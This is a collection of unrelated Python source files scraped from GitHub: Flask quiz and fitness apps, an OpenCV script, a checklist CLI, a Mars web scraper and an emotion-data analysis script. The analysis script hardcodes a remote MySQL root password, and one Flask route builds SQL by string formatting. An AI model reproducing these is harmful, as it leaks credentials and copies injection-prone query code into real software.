\"\"\"\n function for receiving paper answers, store the answers & scores and return to the result page\n @return: return the quiz result page\n @rtype: flask template\n \"\"\"\n open_questions = {}\n left_data = {}\n for key, value in form_data.items():\n if key.startswith('open'):\n open_questions[key] = value\n q_key = key[4:]\n if q_key in form_data:\n open_questions[q_key] = form_data[q_key]\n\n for key, value in form_data.items():\n if key not in open_questions:\n left_data[key] = value\n\n questions = Question.query.filter_by(chapter_id=chapter_id, type=\"open\").order_by(Question.id).all()\n # questions_dump = questionswithanswers_schema.dump(questions)\n # cur_chapter = Chapter.query.get(chapter_id)\n # chapter_dump = chapter_schema.dump(cur_chapter)\n #\n # if current_user.is_authenticated:\n # for aws_id in submitted_answers:\n # new_answer = Answer(\n # user_id=current_user.id,\n # choice_id=aws_id\n # )\n # db.session.add(new_answer)\n # db.session.commit()\n #\n # # if the user is authenticated, update final score to the database\n # if current_user.is_authenticated:\n # new_score = Score(\n # score=cur_score,\n # user_id=current_user.id,\n # chapter_id=chapter_id\n # )\n # db.session.add(new_score)\n # db.session.commit()\n return left_data\n\n\n@bp.route('/paper_writing')\ndef paper_writing():\n \"\"\"\n view function for paper writing page, getting value from previous chapters and showing them here.\n @return: return paper writing page\n @rtype: flask template\n \"\"\"\n ifFinished = request.args.get(\"ifFinished\")\n chapter = Chapter.query.filter_by(level_id=3, order_id=4).first()\n chapter_dump, questions_dump = quiz_questions_helper(chapter.id)\n if ifFinished == \"False\":\n introduction = 'Kombucha, a fermented beverage with roots tracing back over 2000 years to China, ' \\\n 'has gained worldwide popularity due to its purported health benefits (Jayabalan, ' \\\n 'Malbaša, Lončar, Vitas, & Sathishkumar, 2014). Over the years, extensive research ' \\\n 'has been conducted to understand its biochemical properties, microbiology, toxicity, ' \\\n 'cellulose production, and fermentation dynamics (Greenwalt, Steinkraus, & Ledford, 2000; ' \\\n 'Jayabalan et al., 2014; Rosma, Karim, & Bhat, 2012; Sreeramulu, Zhu, & Knol, 2000). ' \\\n 'The microbial diversity of Kombucha has been extensively studied using culture-based methods ' \\\n 'and sequencing of phylogenetic marker genes (Chakravorty et al., 2016; Coton et al., 2017; ' \\\n 'De Filippis, Troise, Vitaglione, & Ercolini, 2018; Marsh, O\\'Sullivan, Hill, Ross, & Cotter, 2014; ' \\\n 'Reva et al., 2015). To build upon these findings, our study will leverage the Galaxy bioinformatics ' \\\n 'platform, a powerful, user-friendly, and open-source tool for the analysis and interpretation of ' \\\n 'genomic data. Our objective is to reanalyze the metagenomic data from two Turkish Kombucha samples, ' \\\n 'harvested at different stages of the fermentation process. We will employ WMS sequencing and ' \\\n 'NGS-based amplicon sequencing (16S rRNA gene and Internal Transcribed Spacer 1 [ITS1]) to derive ' \\\n 'detailed taxonomic and functional characteristics of the Kombucha samples. Through the Galaxy ' \\\n 'platform\\'s robust suite of tools for genomic analysis, we aim to reaffirm the findings of the ' \\\n 'original study and potentially uncover additional insights into the microbial composition and ' \\\n 'functional dynamics of Kombucha. Our work illustrates the potent synergy of traditional microbiological ' \\\n 'studies and modern bioinformatics, paving the way for future explorations in this fascinating field.'\n results_answers_raw = db.engine.execute(\n 'select question.transition_sentence as ts, answer as ans from open_answer, question where question.id = open_answer.question_id and user_id = %s and question.chapter_id = %s' % (\n current_user.id, chapter.id-1))\n results_answers = [dict(row) for row in results_answers_raw]\n results = \"\"\n for r in results_answers:\n results = results + r['ts'] + \" \"\n results = results + r['ans'] + \" \"\n methods_answers_raw = db.engine.execute(\n 'select question.transition_sentence as ts, answer as ans from open_answer, question where question.id = open_answer.question_id and user_id = %s and question.chapter_id = %s' % (\n current_user.id, chapter.id-2))\n methods_answers = [dict(row) for row in methods_answers_raw]\n methods = \"\"\n for r in methods_answers:\n methods = methods + r['ts'] + \" \"\n methods = methods + r['ans'] + \" \"\n print(questions_dump)\n return render_template(\"games/level3/paper_writing.html\", chapter=chapter_dump, questions=questions_dump,\n methods=methods, results=results, introduction=introduction)\n else:\n open_anwser_raw = db.engine.execute(\n 'select question.id as q_id, answer as ans from open_answer, question, chapter where question.chapter_id = chapter.id and question.id = open_answer.question_id and user_id = %s and chapter.id = %s' % (\n current_user.id, chapter.id))\n open_anwers = [dict(row) for row in open_anwser_raw]\n for question in questions_dump:\n for oa in open_anwers:\n if str(oa['q_id']) == str(question['id']):\n question['ans'] = oa['ans']\n return render_template(\"games/level3/paper_writing.html\", chapter=chapter_dump, questions=questions_dump)\n\n\n@bp.route('/paper_writing/submit', methods=['POST'])\n@login_required\ndef paper_writing_submit():\n \"\"\"\n function for handling level 3 chapter 4 paper writing\n @return: return the quiz result page\n @rtype: flask template\n \"\"\"\n store_quiz_results(12, request.form)\n return redirect(url_for('dnapi.paper_writing', ifFinished=True))\n\n","repo_name":"StreetScienceCommunity/DNAnalyzer","sub_path":"routes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":28855,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"17004257940","text":"from parabola import *\nfrom axis import *\n\nimport cv2\nimport numpy as np\nimport math\nimport argparse\n\nnp.warnings.filterwarnings('ignore')\n\n\ndef detect_axis_and_parabola(image_name):\n image = cv2.imread(image_name)\n image, edge_map_image, angle_rotation = find_and_draw_axis(image)\n find_and_draw_parabola(image,edge_map_image, angle_rotation)\n cv2.imshow(image_name, image)\n\n\n# main()\nif __name__ == '__main__' :\n\n parser = argparse.ArgumentParser(description='Receive image')\n parser.add_argument('-i', '--img', required=True, type=str, help='Input image path')\n args = parser.parse_args()\n detect_axis_and_parabola(args.img)\n\n key = cv2.waitKey(0)\n if key == 27: # wait for ESC\n print('Key ESC pressed.')\n cv2.destroyAllWindows()\n","repo_name":"thiagodalmoro/INF_UFRGS-Vision","sub_path":"Trab2_Vision/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5101040223","text":"import sys\nimport os\nimport random\n\n# USING TERMCOLOR MODULE FOR COLORED TEXT: https://pypi.org/project/termcolor/\nfrom termcolor import colored\n\nchecklist = list()\n\n# RANDOM COLOR SELECTOR\ndef color_selector():\n color_list = ['grey', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan']\n return random.choice(color_list)\n\n# CREATE\ndef create(item):\n colored_item = colored(item, color_selector())\n checklist.append(colored_item)\n\n# READ\ndef read(index):\n try:\n item = checklist[index]\n return item\n except IndexError:\n return(\"\\nIndex does not exist.\")\n\n# UPDATE\ndef update(index, item):\n try:\n checklist[index] = colored(item, color_selector())\n return(\"\\nItem at index \" + str(index) + \" updated to \" + item)\n except IndexError:\n return(\"\\nIndex does not exist.\")\n\n# DESTROY\ndef destroy(index):\n try:\n checklist.pop(index)\n return(\"\\nItem at index \" + str(index) + \" removed.\")\n except IndexError:\n return(\"\\nIndex does not exist.\")\n\n# MARK COMPLETED\ndef mark_completed(index):\n item = checklist[index]\n\n if item[0] != \"√\":\n checklist[index] = \"√ \" + checklist[index]\n return(\"\\nItem marked as complete.\")\n else:\n return(\"\\nItem is already marked as complete.\")\n\n# MARK INCOMPLETE\ndef mark_incomplete(index):\n item = checklist[index]\n \n if item[0] == \"√\":\n incompleted_item = item.replace(\"√ \",\"\")\n checklist[index] = incompleted_item\n return(\"\\nItem marked as incomplete.\")\n else:\n return(\"\\nItem is already marked as incomplete.\")\n\n# LIST ALL ITEMS\ndef list_all_items():\n index = 0\n for list_item in checklist:\n print(\"{} {}\".format(index, list_item))\n index += 1\n\n# SELECT OPTIONS\ndef select(function_code):\n # Create item\n if function_code == \"a\":\n input_item = user_input(\"Input item: \")\n create(input_item)\n\n # Read item\n elif function_code == \"r\":\n item_index = int(user_input(\"Index Number: \"))\n print(\"\\n\" + read(item_index))\n\n # Print all items\n elif function_code == \"l\":\n list_all_items()\n\n # Update item\n elif function_code == \"u\":\n item_index = int(user_input(\"Index Number: \"))\n update_item = user_input(\"Input item: \")\n print(update(item_index, update_item))\n\n # Destroy item\n elif function_code == \"d\":\n item_index = int(user_input(\"Index Number: \"))\n print(destroy(item_index))\n \n # Mark Complete/Incomplete\n elif function_code == \"m\":\n complete_incomplete = user_input(\"Mark as Complete or Incomplete?(Enter C/I): \").lower()\n\n if complete_incomplete == \"c\":\n item_index = int(user_input(\"Index Number: \"))\n print(mark_completed(item_index))\n \n elif complete_incomplete == \"i\":\n item_index = int(user_input(\"Index Number: \"))\n print(mark_incomplete(item_index))\n \n else:\n print(\"Invalid Option\")\n\n elif function_code == \"q\":\n return False\n\n # Catch all\n else:\n print(\"Unknown Option\")\n return True\n\n# USER INPUT\ndef user_input(prompt):\n user_input = input(prompt)\n return user_input\n\n# TESTING FUNCTIONS\ndef test():\n create(\"purple sox\")\n create(\"red cloak\")\n\n print(read(0))\n print(read(1))\n\n update(0, \"purple socks\")\n\n destroy(1)\n\n print(read(0))\n mark_completed(0)\n\n list_all_items()\n\n select(\"C\")\n list_all_items()\n\n select(\"R\")\n list_all_items()\n\n select(\"P\")\n list_all_items()\n\n# RUN TESTS\ntest()\n\nrunning = True\nwhile running:\n os.system(\"clear\")\n selection = user_input(\n \"Press A to Add to list, R to Read from list, L to Display list, U to Update item, D to Destroy item, M to Mark Complete/Incomplete, and Q to quit: \")\n selection_both_cases = selection.lower()\n running = select(selection_both_cases)\n input(\"\\nPress Enter to Continue...\")","repo_name":"soundreaper/CaptainRainbowsColorChecklist","sub_path":"checklist.py","file_name":"checklist.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28936632572","text":"import pymysql\nimport pandas as pd\nimport datetime\nimport numpy as np\nimport random as rd\n\nimport matplotlib.pyplot as plt\nimport matplotlib\n\n\n# Emotion data database\nmysql = pymysql.connect(\n host='35.201.169.147',\n user='root',\n password='1thefull!',\n db='silverCare'\n)\n\n\nemotion_df = pd.read_sql_query(\"SELECT b.SORT, a.REGISTRATION_DATE, a.PUDDING_SERIALNUM, CASE IFNULL(EMOTION, '') WHEN '긍정' THEN 1 * EMOTION_SCORE WHEN '부정' THEN -1 * EMOTION_SCORE ELSE 0 END AS emotionScore FROM ROJA_HI_LOG a, PUDDING_SERIALNUM b WHERE a.PUDDING_SERIALNUM = b.PUDDING_SERIALNUM AND a.SEND_SORT = 'asr' AND a.SENDER <> 'ROJA'\", mysql)\n\n\nclass investigate_emotion:\n \"\"\"\n Use emotion/usage data collected by Dasom.\n Example:\n\n # Get the data of users by region\n busanjin_emotion = investigate_emotion('busanjin')\n gimpojin_emotion = investigate_emotion('Gimpo')\n\n # Plot the change of a user's emotion score by time\n plt.figure(figsize=(16, 8))\n random_user_plot = busanjin_emotion.userEmotionScore(rd.choice(busanjin_emotion.user_list), legend=True)\n\n plt.figure(figsize=(16, 8))\n for user in busanjin_emotion.user_list:\n random_user_plot = busanjin_emotion.userEmotionScore(user)\n\n # Plot the change of aggregated emotion score by time\n plt.figure(figsize=(16, 8))\n busanjin_emotion.totalEmotionScore()\n plt.hlines(y=0, xmin=busanjin_emotion.region_emotion_df.date.iloc[0],\n xmax=busanjin_emotion.region_emotion_df.date.iloc[-1], color=\"red\")\n\n # Plot the change of a user's usage frequency by time\n busanjin_emotion.userFrequency(rd.choice(busanjin_emotion.user_list))\n\n # Plot the change of aggregated usage frequency by time\n busanjin_emotion.totalFrequency(normalize_by_people=True)\n \"\"\"\n\n def __init__(self, region):\n self.region = region\n self.region_emotion_df = emotion_df[(emotion_df.SORT == self.region) & (emotion_df.REGISTRATION_DATE > datetime.date(2019, 12, 1))]\n self.user_list = list(set(self.region_emotion_df.PUDDING_SERIALNUM))\n\n \n \n def userEmotionScore(self, user, period='24H', legend=False):\n # self.region: Gimpo, busanjin, B2C\n user_specific_data = self.region_emotion_df[self.region_emotion_df.PUDDING_SERIALNUM == user]\n user_specific_data[period] = user_specific_data.REGISTRATION_DATE.dt.floor(period)\n mean_data = user_specific_data.groupby(period).mean()\n std_data = user_specific_data.groupby(period).std()\n plt.plot(mean_data.index, mean_data.emotionScore, 'o-', label=user)\n plt.fill_between(mean_data.index, mean_data.emotionScore-std_data.emotionScore,\n mean_data.emotionScore+std_data.emotionScore, alpha=0.3)\n plt.xticks(mean_data.index[[int((mean_data.index.__len__()-1)/3*i) for i in range(3)]])\n if legend == True:\n plt.legend()\n \n \n\n def totalEmotionScore(self, period='24H', legend=False):\n # self.region: Gimpo, busanjin, B2C\n total_data = self.region_emotion_df\n total_data[period] = total_data.REGISTRATION_DATE.dt.floor(period)\n mean_data = total_data.groupby(period).mean()\n std_data = total_data.groupby(period).std()\n plt.plot(mean_data.index, mean_data.emotionScore, 'o-')\n plt.fill_between(mean_data.index, mean_data.emotionScore-std_data.emotionScore,\n mean_data.emotionScore+std_data.emotionScore, alpha=0.3)\n plt.xticks(mean_data.index[[int((mean_data.index.__len__()-1)/3*i) for i in range(3)]])\n if legend == True:\n plt.legend()\n \n\n# def emotionRatio(self, user): # Calculate the ratio of positive/negative ratio (dismiss emotion score)\n\n \n def userFrequency(self, user, alpha=None):\n user_specific_data = self.region_emotion_df[self.region_emotion_df.PUDDING_SERIALNUM == user]\n user_specific_data['date'] = user_specific_data.REGISTRATION_DATE.map(lambda x: x.date())\n count_per_date = user_specific_data.groupby('date').count()['REGISTRATION_DATE']\n \n plt.bar(count_per_date.index, count_per_date, alpha=alpha)\n plt.xticks([count_per_date.index[0], count_per_date.index[-1]])\n plt.ylabel(\"Number of use\")\n plt.xlabel(\"Date\")\n \n \n def totalFrequency(self, normalize_by_people=False):\n total_data = self.region_emotion_df\n total_data['date'] = total_data.REGISTRATION_DATE.map(lambda x: x.date())\n\n count_per_date = total_data.groupby('date').count()['REGISTRATION_DATE']\n\n if normalize_by_people:\n accumulate_count_df = pd.DataFrame(columns=['date', 'PUDDING_SERIALNUM'],\n data=[list(i) for i in total_data.groupby(['date', 'PUDDING_SERIALNUM']).count().index.values])\n accumulate_count_df.set_index('date', inplace=True)\n\n all_users = []\n prev_date = accumulate_count_df.index[0]\n accumulate_count = 0\n accumulate_count_list = []\n for count, (idx, row) in enumerate(accumulate_count_df.iterrows()):\n if idx != prev_date:\n accumulate_count_list.append(accumulate_count)\n prev_date = idx\n if row.PUDDING_SERIALNUM not in all_users:\n all_users.append(row.PUDDING_SERIALNUM)\n accumulate_count += 1\n accumulate_count_list.append(accumulate_count)\n\n plt.bar(count_per_date.index, count_per_date/np.array(accumulate_count_list))\n else:\n plt.bar(count_per_date.index, count_per_date)\n plt.xticks([count_per_date.index[0], count_per_date.index[-1]])\n plt.ylabel(\"Number of use\")\n plt.xlabel(\"Date\")\n","repo_name":"swoh816/DasomDataAnalysis","sub_path":"Emotion/emotion_usage_analysis.py","file_name":"emotion_usage_analysis.py","file_ext":"py","file_size_in_byte":5950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6043624199","text":"from flask import current_app as app\nfrom flask import (render_template,\n redirect,\n flash,\n url_for,\n request)\nfrom flask_login import (current_user,\n login_user,\n logout_user,\n login_required)\n\nfrom .models import db\nfrom .models.posts import Post\nfrom .models.user import User\nfrom .utils import complete_profile_required\nfrom .forms import (RegistrationForm,\n LoginForm,\n EditProfileForm,\n ChangePasswordForm,\n ChangeUsernameForm,\n ChangeEmailForm,\n PostForm,\n EmptyForm)\nfrom .json_info import exercise\nfrom .json_info import mealplan\n\nmealplans = mealplan.MealPlan()\nexerciseplan = exercise.ExercisePlan()\n\n\n#default page to load to when user isn't signed in\n@app.route('/index')\ndef index():\n return render_template('index.html', title='Home')\n\n#home page when user is signed in, shows users current mealplan and exercise\n@app.route('/')\n@app.route('/home')\n@login_required\ndef home():\n return render_template('home.html', title='Home', user = current_user,\n currente = exerciseplan.get_exercise(current_user.get_exercise()), currentm = mealplans.get_mealplan(current_user.get_mealplan()))\n\n#redirect to all exercises\n@app.route('/redirectexercises', methods=['GET','POST'])\n@login_required\ndef redirectexercises():\n return redirect(url_for('exercises'))\n\n#redirect to all mealplans\n@app.route('/redirectmeals', methods=['GET','POST'])\n@login_required\ndef redirectmeals():\n return redirect(url_for('meals'))\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n\n form = LoginForm()\n\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n if user is None or not user.check_password(form.password.data):\n flash('Invalid username or password.', 'danger')\n return redirect(url_for('login'))\n login_user(user, remember=form.remember_me.data)\n return redirect(url_for('home'))\n return render_template('login.html', form=form)\n\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return render_template('index.html', title='Logout')\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('index', title='Already registered.'))\n\n form = RegistrationForm()\n\n if form.validate_on_submit():\n user = User(\n username=form.username.data,\n email=form.email.data,\n profile_completed=False,\n exercise_weight_id = [],\n exercise_weight = []\n )\n user.set_password(form.password.data)\n db.session.add(user)\n db.session.commit()\n return redirect(url_for('edit_profile'))\n return render_template('register.html', form=form)\n\n\n@app.route('/profile', methods=['GET', 'POST'])\n@login_required\n@complete_profile_required\ndef profile():\n return redirect(url_for('user', username=current_user.username))\n\n\n@app.route('/edit_profile', methods=['GET', 'POST'])\n@login_required\ndef edit_profile():\n form = EditProfileForm()\n if form.validate_on_submit():\n current_user.first_name = form.first_name.data\n current_user.last_name = form.last_name.data\n current_user.birthdate = form.birthdate.data\n current_user.height = form.height.data\n current_user.weight = form.weight.data\n current_user.profile_completed = True\n db.session.commit()\n flash('Changes have been saved.', 'success')\n return redirect(url_for('profile'))\n elif request.method == 'GET':\n form.first_name.data = current_user.first_name\n form.last_name.data = current_user.last_name\n form.birthdate.data = current_user.birthdate\n form.height.data = current_user.height\n form.weight.data = current_user.weight\n return render_template('forms/edit_profile.html', title='Edit Profile',\n form=form, user=current_user)\n\n\n@app.route('/account')\n@login_required\ndef account():\n return render_template('account.html', title='Account', user=current_user)\n\n\n@app.route('/change_password', methods=['GET', 'POST'])\n@login_required\ndef change_password():\n form = ChangePasswordForm()\n\n if form.validate_on_submit():\n current_user.set_password(form.new_password.data)\n db.session.commit()\n\n return render_template(\n 'forms/change_password.html', title='Change Password', form=form\n )\n\n\n@app.route('/change_email', methods=['GET', 'POST'])\n@login_required\ndef change_email():\n form = ChangeEmailForm()\n\n if form.validate_on_submit():\n current_user.email = form.new_email.data\n db.session.commit()\n elif request.method == 'GET':\n form.new_email.data = current_user.email\n form.new_email_repeat.data = current_user.email\n\n return render_template(\n 'forms/change_email.html', title='Change Email', form=form\n )\n\n\n@app.route('/change_username', methods=['GET', 'POST'])\n@login_required\ndef change_username():\n form = ChangeUsernameForm()\n\n if form.validate_on_submit():\n current_user.username = form.new_username.data\n db.session.commit()\n elif request.method == 'GET':\n form.new_username.data = current_user.username\n\n return render_template(\n 'forms/change_username.html', title='Change Username', form=form\n )\n\n\n@app.route('/user/', methods=['GET', 'POST'])\n@login_required\ndef user(username: str):\n user = User.query.filter_by(username=username).first_or_404()\n posts = user.posts\n form = EmptyForm()\n return render_template('user.html', user=user, posts=posts, form=form, exerciseplan=exerciseplan)\n\n#looking at a specific mealplan\n@app.route('/meal/')\n@login_required\n@complete_profile_required\n#must input id of meal looking at, allows function to be general for all meals\ndef meal(meal_id: int):\n print(mealplans.get_mealplan(meal_id))\n return render_template('meal.html', title=f'Meal: {meal_id}',\n user = current_user, meal = mealplans.get_mealplan(meal_id))\n\n#set the users current mealplan, method to respond to the button in /meal/\n@app.route('/setmeal', methods = ['GET', 'POST'])\n@login_required\n@complete_profile_required\ndef setmeal():\n if request.method == 'POST':\n sw = request.form.get('action2')\n for meal in mealplans.get_mealplans():\n #determine which meal is being set to the current\n if sw == 'Set ' + str(meal) + ' As Current Meal':\n current_user.set_mealplan(meal.get_id())\n #redirect back to all meals after setting current\n return redirect(url_for('meals'))\n\n#view all meals, also handles button to view a specific meal\n@app.route('/meals', methods=['GET', 'POST'])\n@login_required\n@complete_profile_required\ndef meals():\n #if a button is pressed, determine which button was pressed and redirect to the correct mealplan\n if request.method == 'POST':\n sw = request.form.get('action1')\n return redirect(url_for('meal', meal_id = mealplans.get_mealplan_based_on_name(sw).get_id())) \n #if button wasn't pressed, simply display meals\n return render_template('meals.html', title='Meals',\n user = current_user, current = mealplans.get_mealplan(current_user.get_mealplan()), mealplans = mealplans.get_mealplans())\n\n#view all exercises, also handles button to view specific exercise\n@app.route('/exercises', methods=['GET','POST'])\n@login_required\n@complete_profile_required\ndef exercises():\n #if button is pressed, determine which button was pressed and redirect to the correct exercise\n if request.method == 'POST':\n sw = request.form.get('action1')\n return redirect(url_for('exercise', exercise_id = exerciseplan.get_exercise_based_on_name(sw).get_id()))\n #if button wasn't pressed, simply display all exercises\n else:\n return render_template('exercises.html', title='Exercises',\n user=current_user, current = exerciseplan.get_exercise(current_user.get_exercise()), exercises = exerciseplan.get_exercises())\n\n#view a specific exercise \n#handles both weighted and unweighted exercises\n@app.route('/exercise/', methods=['GET','POST'])\n@login_required\n@complete_profile_required\ndef exercise(exercise_id: int):\n #determine if the exercise associated with exercise_id is weighted or not\n if(exerciseplan.get_exercise(exercise_id).is_weighted()):\n #display weighted exercise, utilizes current_user.get_exercise_weight to account for custom weights\n return render_template('exerciseweighted.html', title=f'Exercise: {exercise_id}',\n user = current_user, weight = current_user.get_exercise_weight(exercise_id), exercise = exerciseplan.get_exercise(exercise_id))\n else:\n #display unweighted exercise\n return render_template('exercise.html', title=f'Exercise: {exercise_id}', \n user = current_user, exercise = exerciseplan.get_exercise(exercise_id))\n\n#set current exercise, responds to button in /exercise/\n@app.route('/setexercise', methods=['GET','POST'])\n@login_required\n@complete_profile_required\ndef setexercise():\n if request.method == 'POST':\n sw = request.form.get('action2')\n #determine which exercise to set to current\n for exercise in exerciseplan.get_exercises():\n if sw == 'Set ' + str(exercise) + ' As Current Exercise':\n current_user.set_exercise(exercise.get_id())\n return redirect(url_for('postexercise', exercise_id=exercise.get_id()))\n\n@app.route('/postexercise/', methods=['GET', 'POST'])\n@login_required\n@complete_profile_required\ndef postexercise(exercise_id):\n form = PostForm()\n\n if request.method == 'POST':\n if form.validate_on_submit():\n post = Post(\n user_id=current_user.id,\n exercise=exercise_id,\n body=form.post.data\n )\n db.session.add(post)\n db.session.commit()\n flash('Your post is now live!')\n return redirect(url_for('exercises'))\n return render_template('postexercise.html', user=current_user, form=form,\n exercise=exerciseplan.get_exercise(exercise_id))\n\n#set a custom weight for an exercise\n#responds to button in /exercise/\n@app.route('/setweight', methods=['GET', 'POST'])\n@login_required\n@complete_profile_required\ndef setweight():\n sw = request.form.get('action2')\n #determine which exercise to set the weight for \n for exercise in exerciseplan.get_exercises():\n if sw == 'Set ' + str(exercise) + \"'s weight\":\n #set the weight for current_user to whatever is pulled from the text box\n current_user.set_exercise_weight(exercise.get_id(), request.form['text'])\n return redirect(url_for('home'))\n\n\n@app.route('/follow/', methods=['POST'])\n@login_required\ndef follow(username):\n form = EmptyForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=username).first()\n if user is None:\n flash('User {} not found.'.format(username), 'danger')\n return redirect(url_for('index'))\n current_user.follow(user)\n db.session.commit()\n flash('You are following {}!'.format(username), 'success')\n return redirect(url_for('user', username=username))\n else:\n return redirect(url_for('index'))\n\n\n@app.route('/unfollow/', methods=['POST'])\n@login_required\ndef unfollow(username):\n form = EmptyForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=username).first()\n if user is None:\n flash('User {} not found.'.format(username), 'danger')\n return redirect(url_for('index'))\n current_user.unfollow(user)\n db.session.commit()\n flash('You are not following {}.'.format(username), 'success')\n return redirect(url_for('user', username=username))\n else:\n return redirect(url_for('index'))\n\n\n@app.route('/user//followers')\ndef followers_list(username: str):\n user = User.query.filter_by(username=username).first_or_404()\n followers = user.followers\n return render_template(\n 'followers.html', title='Followers', followers=followers, user=user\n )\n\n\n@app.route('/user//followed')\ndef followings_list(username: str):\n user = User.query.filter_by(username=username).first_or_404()\n followed = user.followed\n return render_template(\n 'followed.html', title='Followed', followed=followed, user=user\n )\n\n@app.route('/social')\ndef social():\n posts = current_user.followed_posts().all()\n return render_template(\"social.html\", title='Social',\n posts=posts, exerciseplan=exerciseplan)\n\n\n\n# vim: ft=python ts=4 sw=4 sts=4\n","repo_name":"anair14/3380-project-team","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":13320,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"37146324360","text":"from splinter import Browser\nimport requests\nfrom bs4 import BeautifulSoup\nfrom sys import platform\nimport time\nimport pandas\n\ndef init_browser():\n if platform == \"darwin\":\n executable_path = {\"executable_path\": \"/usr/local/bin/chromedriver\"}\n else:\n executable_path = {'executable_path': 'chromedriver.exe'}\n return Browser(\"chrome\", **executable_path, headless=True)\n\ndef scrape_url():\n url = 'https://mars.nasa.gov/news/?page=0&per_page=40&order=publish_date+desc%2Ccreated_at+desc&search=&category=19%2C165%2C184%2C204%3A19&blank_scope=Latest'\n\n browser = init_browser()\n four_pics = []\n browser.visit(url)\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n \n news_title = soup.find_all(\"div\", class_=\"content_title\")[0]\n \n news_title = news_title.text.strip()\n\n time.sleep(3)\n\n news_p = soup.find_all(\"div\", class_=\"article_teaser_body\")[0]\n \n news_p = news_p.text.strip()\n\n browser.quit()\n \n url = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'\n \n browser = init_browser()\n browser.visit(url)\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n\n pics = soup.find('article', class_='carousel_item')\n full_pic = pics('a', class_='button fancybox')\n time.sleep(2)\n \n browser.click_link_by_id(\"full_image\")\n time.sleep(1)\n browser.click_link_by_partial_text(\"more info\")\n\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n img = soup.find('figure', class_=\"lede\")\n img_url = img.find(\"a\")['href']\n featured_image_url = (img.find(\"img\", class_=\"main_image\")['src'])\n featured_image_link = 'https://www.jpl.nasa.gov' + featured_image_url\n \n browser.quit()\n \n url = 'https://twitter.com/marswxreport?lang=en'\n\n browser = init_browser()\n browser.visit(url)\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n\n weather_mars = soup.find_all('p', class_=\"TweetTextSize TweetTextSize--normal js-tweet-text tweet-text\")[0]\n weather_mars = weather_mars.text.strip()\n \n browser.quit()\n \n url = 'https://space-facts.com/mars/'\n \n browser = init_browser()\n browser.visit(url)\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n\n mars_facts = soup.find_all(\"table\")[0]\n pandas.read_html('https://space-facts.com/mars/')\n\n mars_facts_table = pandas.read_html('https://space-facts.com/mars/')\n \n browser.quit()\n \n url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n\n browser = init_browser()\n browser.visit(url)\n time.sleep(1)\n\n html = browser.html\n result = BeautifulSoup(html, 'html.parser')\n results = result.find_all('div', class_=\"result-list\")\n new_link = results[0].find_all('a', class_='itemLink product-item')[0]['href']\n link_names = 'https://astrogeology.usgs.gov' + new_link\n \n browser.visit(link_names)\n html = browser.html\n result = BeautifulSoup(html, 'html.parser')\n link_ready = result.find_all('div', class_=\"downloads\")[0].find('a')['href']\n browser.back()\n browser.quit()\n \n url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n\n browser = init_browser()\n mars = {}\n browser.visit(url)\n html = browser.html\n result = BeautifulSoup(html, 'html.parser')\n results = result.find_all('div', class_=\"description\")\n \n for result in results:\n title = result.find('a', class_=\"itemLink product-item\").find('h3').text\n new_link = result.find_all('a', class_='itemLink product-item')[0]['href']\n link_names = 'https://astrogeology.usgs.gov' + new_link\n browser.visit(link_names)\n html = browser.html\n result = BeautifulSoup(html, 'html.parser')\n link_ready = result.find_all('div', class_=\"downloads\")[0].find('a')['href']\n browser.back() \n four_pics.append(title)\n four_pics.append(link_ready) \n \n mars['news_p'] = news_p\n mars['featured_image_link'] = featured_image_link\n mars['news_title'] = news_title\n mars['weather_mars'] = weather_mars\n mars['mars_facts_table'] = mars_facts_table \n mars['link_ready'] = link_ready\n mars['title'] = title\n four_pics.append(mars)\n\n browser.quit()\n return [four_pics]\n ","repo_name":"GAlves92/Web_Scraping_and_MongoDB","sub_path":"Web Scraping and Mongo/mission_to_mars.py","file_name":"mission_to_mars.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2793359157","text":"#!/usr/bin/python3\n\"\"\"\nRequirements:\n sudo apt install python3-pip\n pip3 install termcolor\n\"\"\"\n\n\"\"\"\nRequirements:\n sudo apt install libnotify-bin\n\"\"\"\n\nimport json\nimport os\nimport subprocess\nfrom termcolor import colored\n\n\ndef parse(data):\n size = len(data[\"list\"])\n\n # Ask if run\n for index, item in enumerate(data[\"list\"]):\n item[\"input\"] = input(\"{}/{}: Run command {} for {}? (y/N) \".format(\n index + 1,\n size,\n colored(item[\"command\"], \"green\"),\n colored(item[\"name\"], \"yellow\"),\n ))\n\n # Run if confirmed\n for index, item in enumerate(data[\"list\"]):\n if item[\"input\"].lower() == \"y\":\n print(\"{}/{}: Running {} for {}...\".format(\n index + 1,\n size,\n colored(item[\"command\"], \"green\"),\n colored(item[\"name\"], \"yellow\"),\n ))\n item[\"status\"] = subprocess.run(item[\"command\"], shell=True)\n\n print(\"{}/{}: {} finished as {}\".format(\n index + 1,\n size,\n 